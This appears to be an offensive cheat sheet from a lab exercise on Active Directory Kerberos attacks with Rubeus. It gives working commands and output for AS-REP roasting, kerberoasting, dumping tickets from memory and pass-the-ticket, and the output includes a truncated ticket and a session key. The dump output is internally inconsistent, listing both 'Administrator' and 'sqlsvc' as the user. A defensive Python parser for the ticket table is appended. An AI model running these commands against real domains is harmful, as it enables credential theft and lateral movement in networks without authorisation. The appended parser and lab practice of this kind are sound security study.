Kerberos
Kerberos (AS-REP)
execute-assembly c:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /user:sqlsvc /nowrap
Kerberos (SPN)
execute-assembly c:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /simple /nowrap
Kerberos Tickets
Kerberos tickets are digital credentials used to authenticate users on a network. Instead of sending passwords, Kerberos issues a TGT (Ticket Granting Ticket) when a user authenticates. That TGT lets the user obtain service tickets for specific resources without entering the password again. Each ticket has a limited lifetime to reduce the window in which it can be reused.
Extract Kerberos Ticket
Kerberos tickets can be extracted directly from memory if any are present in the current logon sessions. Rubeus can be used to list them first (triage) and then dump them.
execute-assembly c:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
Action: Triage Kerberos Tickets (All Users)
[*] Current LUID : 0x56a09
-----------------------------------------------------------------------------------
| LUID | UserName | Service | EndTime |
-----------------------------------------------------------------------------------
| 0xa901f | DC01$ @ PAY.HTB | krbtgt/PAY.HTB | 2/27/2025 11:16:10 AM |
| 0x11725b | DC01$ @ PAY.HTB | ldap/DC01.PAY.HTB | 2/27/2025 11:16:10 AM |
| 0x56a09 | sqlsvc @ PAY.HTB | krbtgt/pay.htb | 2/27/2025 5:19:27 PM |
-----------------------------------------------------------------------------------
Dump the Kerberos ticket for the selected logon session (LUID 0x56a09 in the table above).
execute-assembly c:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /service:krbtgt /luid:0x56a09 /nowrap
[*] Target service : krbtgt
[*] Target LUID : 0x56a09
[*] Current LUID : 0x56a09
UserName : Administrator
Domain : PAY
LogonId : 0x56a09
UserSID : S-1-5-21-2839822896-2191592306-2017040813-500
AuthenticationPackage : Kerberos
LogonType : Interactive
LogonTime : 2/27/2025 1:16:16 AM
LogonServer : DC01
LogonServerDNSDomain : PAY.HTB
UserPrincipalName : Administrator@PAY.HTB
ServiceName : krbtgt/pay.htb
ServiceRealm : PAY.HTB
UserName : sqlsvc (NT_PRINCIPAL)
UserRealm : PAY.HTB
StartTime : 2/27/2025 7:19:27 AM
EndTime : 2/27/2025 5:19:27 PM
RenewTill : 3/6/2025 7:19:27 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : p+00GKftjtwU74EZQtMW3g==
Base64EncodedTicket :
doIFODCCBTSgAwIBBaEDAgEWooIEXjCCBFphggRW...........
Create a new process with its own logon session (LOGON_TYPE 9) so the ticket can be used without touching the current session.
execute-assembly c:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
[*] Action: Create Process (/netonly)
[*] Using random username and password.
[*] Showing process : False
[*] Username : KG7VU7UW
[*] Domain : PB2T3FGC
[*] Password : GTHOXJHA
[+] Process : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 2328
[+] LUID : 0x86bcff
Import the ticket into the newly created logon session. Rubeus ptt selects the target logon session with /luid (the LUID printed by createnetonly), not /service as originally written here:
execute-assembly c:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /luid:0x86bcff /ticket:doIFODCCBTSgAwIBBaEDAg......
[*] Action: Import Ticket
[+] Ticket successfully imported!
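As an added example (not part of the original notes), a Python parser for the Rubeus triage table shown above. On the defensive side it turns that table into an exposure report: which logon sessions on the host still hold unexpired tickets, which of them contain a TGT (krbtgt service), and which belong to a principal other than the current one, which is the material a pass-the-ticket step like the one above would reuse. The sample table is embedded as constructed input copied from the page.

```python
import re
from datetime import datetime

# Constructed sample input: the Rubeus `triage` table from the notes above.
TRIAGE_OUTPUT = """\
[*] Current LUID : 0x56a09
-----------------------------------------------------------------------------------
| LUID | UserName | Service | EndTime |
-----------------------------------------------------------------------------------
| 0xa901f | DC01$ @ PAY.HTB | krbtgt/PAY.HTB | 2/27/2025 11:16:10 AM |
| 0x11725b | DC01$ @ PAY.HTB | ldap/DC01.PAY.HTB | 2/27/2025 11:16:10 AM |
| 0x56a09 | sqlsvc @ PAY.HTB | krbtgt/pay.htb | 2/27/2025 5:19:27 PM |
-----------------------------------------------------------------------------------
"""

# One data row: | LUID | user @ realm | service | end time |
ROW = re.compile(r"^\|\s*(0x[0-9a-fA-F]+)\s*\|\s*(.+?)\s*@\s*(\S+)\s*\|\s*(\S+)\s*\|\s*(.+?)\s*\|$")
CURRENT = re.compile(r"\[\*\] Current LUID\s*:\s*(0x[0-9a-fA-F]+)")

def parse_triage(text):
    """Return (current LUID as int, list of ticket dicts) from triage output."""
    current, tickets = None, []
    for line in text.splitlines():
        line = line.strip()
        m = CURRENT.match(line)
        if m:
            current = int(m.group(1), 16)
            continue
        m = ROW.match(line)
        if not m:
            continue  # header, separator or unrelated line
        luid, user, realm, service, end = m.groups()
        tickets.append({
            "luid": int(luid, 16), "user": user, "realm": realm, "service": service,
            "is_tgt": service.lower().startswith("krbtgt/"),
            "end": datetime.strptime(end, "%m/%d/%Y %I:%M:%S %p"),
        })
    return current, tickets

def exposure_report(text, now):
    """Group still-valid tickets by logon session; 'foreign' marks sessions of
    a principal other than the current one, 'tgt' marks sessions holding a TGT."""
    current, tickets = parse_triage(text)
    report = {}
    for t in tickets:
        if t["end"] <= now:
            continue  # expired tickets cannot be replayed, so they are not exposure
        entry = report.setdefault(t["luid"], {
            "user": t["user"], "tgt": False, "foreign": t["luid"] != current, "services": []})
        entry["tgt"] = entry["tgt"] or t["is_tgt"]
        entry["services"].append(t["service"])
    return report
```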